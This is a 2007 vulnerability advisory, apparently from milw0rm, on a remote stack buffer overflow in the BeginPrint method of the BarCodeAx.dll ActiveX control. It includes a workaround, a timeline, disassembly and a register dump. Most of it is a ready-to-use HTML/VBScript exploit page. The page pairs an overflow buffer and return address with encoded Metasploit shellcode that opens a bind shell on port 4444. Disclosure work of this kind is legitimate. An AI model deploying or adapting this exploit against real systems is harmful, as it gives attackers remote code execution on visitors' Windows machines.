:. GOODFELLAS Security Research TEAM .:
:. http://goodfellas.shellcode.com.ar .:
BarCodeAx.dll v. 4.9 ActiveX Control Remote Stack Buffer Overflow
=================================================================
Internal ID: VULWAR200706223
Introduction
------------
BarCodeAx.dll is a library included in the Barcode ActiveX software
package from the Company RKD:
(http://www.barcodetools.com/barcode/barcode-activex/barcode-activex.html)
Such package allows to manage the printing of different barcodes.
One of the BarcodeAx.dll exported methods is vulnerable to a stack buffer
overflow which can be remotely exploited.
tested in
---------
- Windows XP SP2 english/french with IE 6.0 / 7.0
- windows vista Professional SP1 with IE 7.0
Summary
-------
The BeginPrint method fail to correctly check the size of the arguments
that receives, causing a stack buffer overflow.
Impact
------
Any application that uses the said ActiveX to control barcodes would be
exposed to remote code execution.
Workaround
----------
- Activate the Kill bit zero in CLSID:C26D9CA8-6747-11D5-AD4B-C01857C10000
- Unregister BarCodeAx.dll using regsvr32
Timeline
--------
June 21, 2007 -- Bug discovery
June 22, 2007 -- Bug published
Credits
-------
* callAX <callax@shellcode.com.ar>
* GoodFellas Security Research Team <goodfellas.shellcode.com.ar>
Technical Detail
----------------
Vulnerable method.
Sub BeginPrint (
ByVal name As String
)
We need 656 bytes to overflow the buffer and rewrite EBP + EIP.
- Reversing
7C97DF40 PUSH 0
7C97DF42 PUSH ESI
7C97DF43 CALL 7C97CDC9
7C97DF48 MOV EBX,[EBP+10]
7C97DF4B LEA EDI,[EBX-8]
7C97DF4E MOV [EBP-2C],EDI
7C97DF51 MOVZX EAX,WORD PTR [EDI] <--- CRASH
7C97DF54 SHL EAX,3
7C97DF57 MOV [EBP-30],EAX
7C97DF5A PUSH 7C97E11C
7C97DF5F PUSH EDI
7C97DF60 PUSH ESI
7C97DF61 CALL 7C97CC6D
7C97DF66 TEST AL,AL
7C97DF68 JE 7C97E0BF
- Registers
EIP 41414141
EAX C0040204
EBX 00407830 -> 003E977D
ECX 0013ECE8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 00150608 -> 7C98C500
EDI 00000000
ESI 001844CC -> 00180008
EBP 41414141
ESP 0013EBE8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Basic Crafted Html File
-----------------------
<object classid='clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000' id='Crash'></object>
<input language=VBScript onclick=Boom() type=button value="Dale callAX!">
<script language = 'vbscript'>
Sub Boom()
<!-- This exploit opens the port 4444. Thanks to Metasploit for Shellcode -->
malicious_buffer = String(656, "x")
eip = unescape("%EB%AA%3F%7E")
noping = String(10, unescape("%90"))
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e") & _
unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48") & _
unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37") & _
unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58") & _
unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48") & _
unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c") & _
unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e") & _
unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58") & _
unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44") & _
unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48") & _
unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d") & _
unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58") & _
unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56") & _
unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46") & _
unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37") & _
unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e") & _
unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e") & _
unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50") & _
unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55") & _
unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54") & _
unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41") & _
unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a") & _
unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41") & _
unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32") & _
unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d") & _
unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d") & _
unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46") & _
unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45") & _
unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46") & _
unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c") & _
unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c") & _
unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32") & _
unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46") & _
unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f") & _
unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56") & _
unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46") & _
unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36") & _
unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f") & _
unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d") & _
unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d") & _
unescape("%4f%4f%42%4d%5a")
eat_this = malicious_buffer + eip + noping + shellcode
Crash.BeginPrint eat_this
End Sub
</script>
# milw0rm.com [2007-06-22]